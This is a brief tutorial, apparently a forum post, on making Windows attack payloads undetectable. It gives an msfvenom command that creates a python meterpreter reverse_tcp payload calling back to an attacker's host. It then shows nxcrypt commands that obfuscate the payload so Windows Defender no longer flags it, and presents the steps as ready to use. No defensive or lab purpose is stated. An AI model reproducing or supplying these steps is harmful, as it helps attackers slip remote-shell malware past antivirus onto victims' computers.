Greetings everyone, hope you all are fine and shine. Recently hackersploit live streamed on how to actually manually embed payload(s) in apk. I see alot of people were asking for how to create undectectable payload for windows, and a few of them asked that windows defender is not allowing the the exe. So here’s the tutorial for those who needs it.
In this tutorial we will be using a tool called nxcrypt, which is python based and is written by Hadi Mene (h4d3s). The tool actually makes your payload undetectable
First thing first we have to create a payload first.
$sudo msfvenom --payload=python/meterpreter/reverse_tcp LHOST=(ip_here)
Now that was how to create payload. If you move this payload to windows
machine (like windows 10), it will delete it and detect it as it’s harmful.
Now you need to make this payload undetectable, to do that first we need a
a python script named as nxcrypt. This will make the payload undetectable.
STEPS TO MAKE PAYLOAD UNDETECTABLE
Once you have the nxcrypt, you can play around with it.
$sudo python nxcrypt.py --help (show the help menu)
There are very less options, so it’s pretty easy to understand.
Now to make payload undetectable simply type the following.
$sudo python nxcrypt.py /(path_of_payload) -f (path_to_save)
Now try to move the payload again to your windows machine, and you will find that it
will be no more detected.
Here is the video if you didn’t get it so = https://www.youtube.com/watch?v=G6k2LL-RE8c&t=52s
Thank You <3